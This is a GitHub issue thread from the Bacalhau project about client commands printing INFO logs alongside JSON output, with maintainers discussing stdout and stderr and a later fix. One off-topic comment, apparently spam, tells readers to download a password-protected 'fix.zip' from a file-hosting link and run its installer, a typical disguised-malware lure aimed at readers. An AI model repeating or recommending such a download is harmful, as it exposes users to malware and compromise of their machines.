### ISSUE TITLE
Bacalhau Client commands should log at Error level by default

### ISSUE THREAD

**Issue by aronchick** [bacalhau-project/bacalhau#4342]
immediately after installing on a new machine

```
$ bacalhau node list --output json --api-host 0.0.0.0
01:22:21.385 | INF pkg/repo/fs.go:99 > Initializing repo at '/home/azureuser/.bacalhau' for environment 'production'
[{"Info":{"NodeID":"n-d620a0f0-0ee8-4d13-9120-6cf2a6898c80","NodeType":"Requester","Labels":{"Architecture":"amd64","DISK_GB":"29","HOSTNAME":"uu5tba-vm","IP":"13.89.100.89","LOCATION":"centralus","MACHINE_TYPE":"Standard_DS1_v2","MEMORY_GB":"3.3","NODE_TYPE":"requester","ORCHESTRATORS":"0.0.0.0","Operating-System":"linux","VCPU_COUNT":"1"},"BacalhauVersion":{"Major":"1","Minor":"4","GitVersion":"v1.4.0","GitCommit":"081eabfba0d723fbd3889d8e4e59c1ffc126ad0f","BuildDate":"2024-06-28T10:14:58Z","GOOS":"linux","GOARCH":"amd64"}},"Membership":"APPROVED","Connection":"DISCONNECTED"}]
```

Notice the first line - even thought it was supposed to be in "json"

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by frrist** [comment]
The output flag on the command wasn't ignored, the returned content is json and is written to stdout.

The first line: 
> 01:22:21.385 | INF pkg/repo/fs.go:99 > Initializing repo at '/home/azureuser/.bacalhau' for environment 'production'  

Is a log message, written to stderr.

> [{"Info":{"NodeID":"n-d620a0f0-0ee8-4d13-9120-6cf2a6898c80","NodeType":"Requester","Labels":{"Architecture":"amd64","DISK_GB":"29","HOSTNAME":"uu5tba-vm","IP":"13.89.100.89","LOCATION":"centralus","MACHINE_TYPE":"Standard_DS1_v2","MEMORY_GB":"3.3","NODE_TYPE":"requester","ORCHESTRATORS":"0.0.0.0","Operating-System":"linux","VCPU_COUNT":"1"},"BacalhauVersion":{"Major":"1","Minor":"4","GitVersion":"v1.4.0","GitCommit":"081eabfba0d723fbd3889d8e4e59c1ffc126ad0f","BuildDate":"2024-06-28T10:14:58Z","GOOS":"linux","GOARCH":"amd64"}},"Membership":"APPROVED","Connection":"DISCONNECTED"}]

The rest of the output comes from the command, and is written to stdout as json.

**Comment by aronchick** [comment]
We should NEVER EVER EVER EVER write logs to stderr unless they are errors. That is an "INFO".

Also,

**Comment by frrist** [comment]
> We should NEVER EVER write logs to stderr unless they are errors. That is an "INFO".

Understood, will re-purpose this issue to change the default logging level for client commands to log at the Error level only.

> This logs in via golang, and is indistinguishable as stdout vs. stderr

Assumedly, this is go code that is shelling out to a bacalhau binary installed on the host? If that is the case it might be worth using https://pkg.go.dev/os/exec#Cmd.StderrPipe and https://pkg.go.dev/os/exec#Cmd.StdoutPipe to differentiate errors from the app vs. output of the bacalhau command being executed.

**Comment by wdbaruni** [comment]
This was partialy fixed in https://github.com/bacalhau-project/bacalhau/pull/4588 and released with v1.5.0, and now will look like:
```
→ bacalhau node list --output json --limit 1
Initializing repo at /Users/walid/.bacalhau
[{"Info":{"NodeID":"QmPLPUUjaVE3wQNSSkxmYoaBPHVAWdjBjDYmMkWvtMZxAf","NodeType":"Compute","Labels":{"Architecture":"amd64","Operating-System":"linux","name":"node-2","owner":"bacalhau"},"ComputeNodeInfo":{"ExecutionEngines":["wasm","docker"],"Publishers":["noop","s3","local","ipfs"],"StorageSources":["inline","s3","ipfs","urldownload"],"MaxCapacity":{"CPU":1.4,"Memory":5827443507,"Disk":1473789946675},"QueueCapacity":{},"AvailableCapacity":{"CPU":1.4,"Memory":5827443507,"Disk":1473789946675},"MaxJobRequirements":{"CPU":1.4,"Memory":5827443507,"Disk":1473789946675},"RunningExecutions":0,"EnqueuedExecutions":0},"BacalhauVersion":{"Major":"1","Minor":"5","GitVersion":"v1.5.0","GitCommit":"f9d5c971d381a26e8f9393ee7f04de4016cba13c","BuildDate":"2024-10-07T14:01:16Z","GOOS":"linux","GOARCH":"amd64"}},"Membership":"APPROVED","Connection":"CONNECTED"}]
```

1. Now all logs go to stdout instead of stderr
2. Client command logs are more user friendly format that is different than `serve` log format which is more suitable for running a server
3. We minimized the logs that we print in client commands such as `node list` and `docker run`. The repo initialization is only logged the very first time you use a data dir
